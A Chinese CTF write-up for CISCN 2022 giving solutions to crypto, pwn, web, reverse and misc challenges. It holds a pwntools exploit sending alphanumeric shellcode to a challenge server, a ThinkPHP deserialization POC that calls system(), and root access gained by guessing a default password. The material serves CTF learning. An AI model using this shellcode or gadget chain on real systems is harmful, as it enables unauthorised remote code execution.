咕了有点久了，来发一下

CISCN2022初赛WP

一、 战队信息

战队名称：flag虽不能至，然心向往之

战队排名：第130名

Crypto

签到电台

根据题目的提示从公众号获取两个hint：

1. 在“标准电码表”找“弼时安全到达了”所对应的7个电码，再跟“密码本”的前7*4个数字分别逐位进行“模十算法”（加不进位、减不借位），所得到的就是要发送的电码。发送电码前先发送“s”启动，即按3个“.”，这个发送电报的过程可以使用抓包软件进行抓取，可方便输入电报。

2. “弼时安全到达了”所对应的7个电码：1732 2514 1344 0356 0451 6671 0055。模十算法示例：1732与6378得到7000，发包示例：/send?msg=s

然后访问/secret看到密码，取前28个做模10运算，再用hint2的发包方式发送得到flag。

基于挑战码的双向认证

这题给了 ssh，有权限就想着先连一下，连上去之后试试 find / | grep "flag.txt" 找到一个类似 flag的东西，但是不是 flag，此时又看到两个题目是连着的，所以就猜测应该是 flag1.txt 和 flag2.txt。寻找之后发现 /root/cube-shell/instance/flag_server/ 目录下存在，然后就直接拿到两个题目的 flag 了。

基于挑战码的双向认证3

有了前两道题目的铺垫之后，又试了试查看该目录下的 flag 发现权限不够，然后就尝试提权，直接试试看默认密码，随便输了几个试到了 toor 直接就提权了，然后拿下flag。

ISO9798

链接靶机，有pow，爆破即可

from hashlib import *
hash='ed8e248b4ec6828ea8f2cda56293484cbff40d934aba1e641cc3fcbf94e1757c'
sss='Eee9sVQumMWXoLEL'
table='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
for ch1 in table:
    for ch2 in table:
        for ch3 in table:
            for ch4 in table:
                hashvalue=sha256((ch1+ch2+ch3+ch4+sss).encode()).hexdigest()
                if hashvalue==hash:
                    print(ch1+ch2+ch3+ch4)
                    quit()

然后输入32个0过第二步

返回一长串字符串

4993ad5ec5dfd5147003438c0e6afd696b026f48fb9676d625dbb6e2b1536b803c4d2e0a001b998f0d6afcb063e71fd8

根据提示分成ra,rb,k

ra=4993ad5ec5dfd5147003438c0e6afd69

rb=6b026f48fb9676d625dbb6e2b1536b80

K=3c4d2e0a001b998f0d6afcb063e71fd8

然后组合一下rb+ra为

6b026f48fb9676d625dbb6e2b1536b804993ad5ec5dfd5147003438c0e6afd69

打入出flag

Pwn

漏洞点在选项2，选项2用 mmap 开辟了一个可读可写可执行的内存，并可以往上面写东西，并且执行过去，那么就确定要在上面写 shellcode，但是之前有三个check，后两个经过交叉引用可知在选项 1 中给 ro0t 可以将它置为1，于是我们就先用选项 1 置为1，再用选项 2 去写 shellcode，但是每个字节都有 isprint 的 check，那好办，就直接写 alphanumeric shellcode。

在下面这个文章中找到用的shellcode

https://blog.csdn.net/Y_peak/article/details/115307573

然后写出exp

#coding=utf-8
from pwn import*
#io=process('./login')
io=remote('101.201.123.35',27290)
io.sendline('opt:1\r\nmsg:ro0t\r\n')
code = b'Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
io.sendline(b'opt:2\r\nmsg:'+code+b'\r\n')
io.interactive()

web

TP的新链子，具体漏洞分析在这：

https://www.freebuf.com/vuls/321546.html

下图可见在/index.php/Index/test POST传序列化字符串给a即可

POC在此，ls一下再读下flag即可。

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['ls']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
?>

Reverse

baby_tree

直接看ast，assign_expr是赋值语句，binary_expr里面decl=后面是运算符，argument_list里的两个argument参与运算，分析一下主要逻辑，写出对应的解密脚本。

脚本：

#include <stdio.h>
unsigned char b[] = {88, 35, 88, 225, 7, 201, 57, 94, 77, 56, 75, 168, 72, 218, 64, 91, 16, 101, 32, 207, 73, 130, 74, 128, 76, 201, 16, 248, 41, 205, 103, 84, 91, 99, 79, 202, 22, 131, 63, 255, 20, 16};
unsigned char k[] = "345y";
int main()
{
    for (int i = 0; i < 42 - 3; i++)
    {
        unsigned char tmp = k[0];
        k[0] = k[1];
        k[1] = k[2];
        k[2] = k[3];
        k[3] = tmp;
    }
    for (int i = 42 - 4; i >= 0; i--)
    {
        unsigned char r0 = b[i + 0], r1 = b[i + 1], r2 = b[i + 2], r3 = b[i + 3];
        unsigned char tmp = k[3];
        k[3] = k[2];
        k[2] = k[1];
        k[1] = k[0];
        k[0] = tmp;
        b[i + 0] = r2 ^ k[2];
        b[i + 1] = r3 ^ k[3];
        b[i + 2] = ((k[0] + (b[i + 0] >> 4)) & 0xff) ^ r0;
        b[i + 3] = ((k[1] + (b[i + 1] >> 2)) & 0xff) ^ r1;
    }
    for (int i = 0; i < 42; i++)
    {
        putchar(b[i]);
    }
    return 0;
}

运行上面的程序拿到flag

MISC

everlasting_night

本来以为不是lsb隐写（因为隐藏字母太小太犄角旮旯了没看见），查看属性无信息获取

拉入010editor中查看png的文件头和文件尾，发现文件尾后面有一段多出来的字符，不知道是做什么的，先放着

题目提示含lsb隐写后，拉入Stegsolve查看，终于在Alpha2处发现右下角有猫腻

但是分析并没有得出信息，坚信信息就隐藏在这里，查阅字典发现row译为中文是行，column是柱，猜测可能是因为右下角的信息是一列的，而我刚开始查看是以行查看，修改成功数据后发现隐藏文本

拿到这串数字后第一反应使用lsb的工具

拿到一个文本文件，拉入010查看发现是压缩包文件头，果断修改后缀名为rar

但是解压需要密码，猜测开头在文件尾后的那一串是密码，但是输入后发现不是，猜测可能是某种加密，广泛尝试后发现是md5隐写

解压后得到一个没有后缀的flag文件

拉入010发现是PNG文件，本来想通过改后缀名拿到答案，后来发现还是太天真

使用ps和画图打开无果，想到gimp，将文件后缀名改为data后用gimp打开

发现图片有些怪怪的，本来想拼图找一下flag，但是实在考验眼力，于是尝试修改各种数值，发现猫腻出在宽度上

拿到答案，提交

ez_usb

使用 wireshark 打开发现是 usb 键盘流量

有两个不同的 usb.addr 发送数据，分别将其保存到两个不同的流量包

用键盘流量分析工具对其提取数据：https://github.com/WangYihang/UsbKeyboardDataHacker

发现有一个 rar 文件，一个 35c535765e50074a，打开rar文件发现需要密码，应该另一串字符就是密码，输入成功拿到 flag 文件

问卷调查

填个问卷而已